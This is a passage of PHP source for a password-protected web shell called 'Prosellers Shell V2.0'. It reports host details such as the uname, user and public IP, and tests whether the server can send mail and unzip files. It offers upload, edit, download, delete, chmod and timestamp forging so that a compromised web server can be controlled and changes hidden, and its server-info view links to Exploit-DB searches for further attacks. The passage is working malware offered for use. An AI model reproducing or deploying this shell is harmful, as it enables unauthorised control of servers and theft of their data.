($_GET['checkpass'] === $auth_pass), 'uname' => php_uname(), 'php_version' => phpversion(), 'ip' => $publicIp ? $publicIp : ($_SERVER['SERVER_ADDR'] ?? gethostbyname(gethostname())), 'user' => get_current_user() ]); exit; } if (isset($_GET['checkmail'], $_GET['pass'])) { header('Content-Type: application/json'); if ($_GET['pass'] !== $auth_pass) { echo json_encode(['status' => false]); exit; } $email = $_GET['checkmail']; if (!filter_var($email, FILTER_VALIDATE_EMAIL)) { echo json_encode(['status' => false]); exit; } $sent = @mail($email, "Test Mail", "This is a test mail from " . $_SERVER['SERVER_NAME']); echo json_encode(['status' => $sent]); exit; } if (isset($_GET['checkunzip'], $_GET['pass'])) { header('Content-Type: application/json'); if ($_GET['pass'] !== $auth_pass) { echo json_encode(['status' => false]); exit; } $hasUnzip = false; if (class_exists('ZipArchive')) { $hasUnzip = true; } else { $paths = ['/usr/bin/unzip', '/bin/unzip', '/usr/local/bin/unzip', '/sbin/unzip']; foreach ($paths as $p) { if (@file_exists($p) && @is_executable($p)) { $hasUnzip = true; break; } } } echo json_encode(['status' => $hasUnzip]); exit; } if (isset($_GET['logout'])) { session_destroy(); header("Location: ?"); exit; } if (isset($_POST['pass']) && $_POST['pass'] === $auth_pass) $_SESSION['logged_in'] = true; if (empty($_SESSION['logged_in'])) { ?> Prosellers Shell V2.0 Login

Login

'', 'file' => '', 'upload' => '', 'plus' => '', 'trash' => '', 'search' => '', 'edit' => '', 'home' => '', 'terminal' => '', 'download' => '', 'chevron-right' => '', 'server' => '', 'archive' => '', 'clock' => '', 'lock' => '', 'menu' => '' ]; return $icons[$name] ?? ''; } // === LOGIC HANDLERS === // 1. Server Info & PHPInfo $serverInfo = null; if (isset($_GET['view']) && $_GET['view'] === 'server_info') { $hddTotal = @disk_total_space($rootPath); $hddFree = @disk_free_space($rootPath); $hddTotalGB = $hddTotal ? round($hddTotal / (1024*1024*1024), 2) : 0; $hddFreeGB = $hddFree ? round($hddFree / (1024*1024*1024), 2) : 0; $hddPercent = $hddTotalGB > 0 ? round(($hddFreeGB/$hddTotalGB)*100, 2) : 0; $serverInfo = [ 'Uname' => php_uname(), 'User' => get_current_user() . ' (' . getmyuid() . ') Group: ' . get_current_user() . ' (' . getmygid() . ')', 'Php' => phpversion() . ' Safe mode: ' . (ini_get('safe_mode') ? 'ON' : 'OFF'), 'Hdd' => "$hddTotalGB GB Free: $hddFreeGB GB ($hddPercent%)", 'Software' => $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown' ]; } if (isset($_GET['action']) && $_GET['action'] === 'phpinfo') { phpinfo(); exit; } // 2. New File/Folder if (isset($_POST['create'], $_POST['name'])) { $newPath = $currentPath . '/' . basename($_POST['name']); if (!file_exists($newPath)) { if ($_POST['create'] === 'folder') mkdir($newPath, 0755); else file_put_contents($newPath, ''); header('Location: ?path=' . urlencode($currentPath) . '&msg=created'); exit; } } // 3. File Content Save if (isset($_POST['content'], $_POST['file'])) { $file = realpath($_POST['file']); if ($file && is_writable($file)) { file_put_contents($file, $_POST['content']); header('Location: ?path=' . urlencode($currentPath) . '&msg=saved'); exit; } } // 4. Upload if (isset($_POST['upload']) && isset($_FILES['uploads'])) { foreach ($_FILES['uploads']['tmp_name'] as $key => $tmp_name) { $name = basename($_FILES['uploads']['name'][$key]); move_uploaded_file($tmp_name, $currentPath . '/' . $name); } header('Location: ?path=' . urlencode($currentPath) . '&msg=uploaded'); exit; } // 5. Rename if (isset($_POST['action']) && $_POST['action'] === 'rename' && isset($_POST['oldname'], $_POST['newname'])) { $old = realpath($currentPath . '/' . $_POST['oldname']); $new = $currentPath . '/' . basename($_POST['newname']); if ($old && $old !== $new) { rename($old, $new); header('Location: ?path=' . urlencode($currentPath)); exit; } } // 6. Delete if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'delete') { $selected = $_POST['selected_files'] ?? []; foreach ($selected as $f) { $target = realpath($currentPath . DIRECTORY_SEPARATOR . $f); if (!$target) continue; if (is_file($target)) @unlink($target); elseif (is_dir($target)) @rmdir($target); // Note: Simple rmdir, non-recursive for safety by default in origin } header('Location: ?path=' . urlencode($currentPath) . '&msg=deleted'); exit; } // 7. Download if (isset($_GET['download'])) { $file = realpath($_GET['download']); if ($file && is_file($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } } // 8. Unzip if (isset($_POST['action']) && $_POST['action'] === 'unzip' && isset($_POST['file'])) { $zipFile = realpath($currentPath . '/' . $_POST['file']); if ($zipFile && is_file($zipFile) && extension_loaded('zip')) { $zip = new ZipArchive; if ($zip->open($zipFile) === TRUE) { $zip->extractTo($currentPath); $zip->close(); header('Location: ?path=' . urlencode($currentPath) . '&msg=unzipped'); exit; } else { echo ""; } } } // 9. Touch (Change Date) if (isset($_POST['action']) && $_POST['action'] === 'touch' && isset($_POST['file'], $_POST['datetime'])) { $target = realpath($currentPath . '/' . $_POST['file']); $time = strtotime($_POST['datetime']); if ($target && $time) { if (@touch($target, $time)) { header('Location: ?path=' . urlencode($currentPath) . '&msg=date_changed'); exit; } else { echo ""; } } } // 10. Chmod if (isset($_POST['action']) && $_POST['action'] === 'chmod' && isset($_POST['file'], $_POST['perms'])) { $target = realpath($currentPath . '/' . $_POST['file']); $perms = intval($_POST['perms'], 8); if ($target && $perms) { if (@chmod($target, $perms)) { header('Location: ?path=' . urlencode($currentPath) . '&msg=perms_changed'); exit; } else { echo ""; } } } // === VIEW VARIABLES === $isEditMode = isset($_GET['edit']) && is_file($_GET['edit']); $editFile = $isEditMode ? realpath($_GET['edit']) : null; $editContent = $editFile ? htmlspecialchars(file_get_contents($editFile)) : ''; $files = []; if (is_dir($currentPath)) { $raw = @scandir($currentPath); if ($raw) { foreach ($raw as $item) { if ($item === '.') continue; $path = $currentPath . DIRECTORY_SEPARATOR . $item; $isDir = is_dir($path); $files[] = [ 'name' => $item, 'path' => $path, 'type' => $isDir ? 'dir' : 'file', 'size' => $isDir ? '-' : (is_readable($path) ? round(filesize($path)/1024, 2).' KB' : '???'), 'perms' => ($p = @fileperms($path)) ? substr(sprintf('%o', $p), -4) : '????', 'mtime' => @filemtime($path) ?: 0 ]; } } } ?> Prosellers Shell V2.0

Server Information

Uname:
[ Google ] [ Exploit-DB ]
User:
Php:
[ phpinfo ] Datetime:
Hdd:

Software


Back to Files

Editing:

Cancel
Name Size Perms Date Actions
..
Home Directory